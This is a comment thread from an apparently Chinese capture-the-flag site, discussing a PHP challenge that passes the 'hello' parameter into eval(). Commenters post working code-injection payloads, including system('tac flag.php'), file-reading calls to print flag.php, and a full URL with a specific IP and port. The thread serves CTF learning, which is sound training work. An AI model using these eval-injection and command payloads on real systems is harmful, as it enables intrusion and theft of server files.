评分(10)
解题动态
巴咕噜182 攻破了该题 58分钟前
SurPLus007 攻破了该题 1小时前
zhaowenxin 攻破了该题 6小时前
yang0000 攻破了该题 15小时前
Biscuitvv 攻破了该题 15小时前
香蕉君 攻破了该题 18小时前
四叠半神话大系 攻破了该题 20小时前
lnboxue 攻破了该题 20小时前
chi 攻破了该题 21小时前
aboic 攻破了该题 1天前
youbug 攻破了该题 1天前
YYYYHHHHNNNN 攻破了该题 1天前
lance 攻破了该题 1天前
彭彭 攻破了该题 1天前
qwaeawd 攻破了该题 1天前
zzuer 攻破了该题 1天前
chenwei001 攻破了该题 1天前
大大怪将军 攻破了该题 1天前
jcccc 攻破了该题 1天前
评论
juice 4年前
举报
show_source('flag.php')
yyt123 4年前
举报
hello=1,$v=file('./flag.php'),print_r($v)
yyt123 4年前
举报
@LSYLTH 可以用hello读文件也可以不用,这里随便给hello赋了个值,之后定义了一个变量去读flag.php
LSYLTH 4年前
举报
这是怎么构造这个playload的呀
你看 4年前
举报
require 一般放在 PHP 文件的最前面,程序在执行前就会先导入要引用的文件; include 一般放在程序的流程控制中,当程序执行时碰到才会引用,简化程序的执行流程。 require 引入的文件有错误时,执行会中断,并返回一个致命错误; include 引入的文件有错误时,会继续执行,并返回一个警告。
safemaker2021 4年前
举报
把file函数带进去eval中,以PHP执行
Easyoung 4年前
举报
直接在评论里发flag,年轻人不讲武德?
sn1p3r 4年前
举报
@harry 看到管理员三个字,熠熠生辉。
harry 管理员 4年前
举报
动态flag他们发了也没事
xiao 4年前
举报
直接用?hello=file('flag.php'),var_dump()函数可以打印
wyx48046 4年前
举报
厉害!
Hiiro 4年前
举报
大佬大佬
test_ctf 4年前
举报
牛逼!
Hacker23 4年前
举报
http://114.67.246.176:10183/?hello=system('tac flag.php')
ZTyyds 4年前
举报
原理是什么啊???想了解一下
guoguo 4年前
举报
题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph
dsadscxzewq 4年前
举报
为啥用cat不行呢?
痕夕 4年前
举报
看不懂,求解,大佬
SwBack 4年前
举报
大道至简,直接当作一句话利用即可 hello=system('tac flag.php')
巨人肩膀上的矮子 4年前
举报
@dsadscxzewq cat是可以的,只不过在源代码里查看
dsadscxzewq 4年前
举报
为啥用cat不行呢?
BBBugku 4年前
举报
F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。
krystalll 4年前
举报
感谢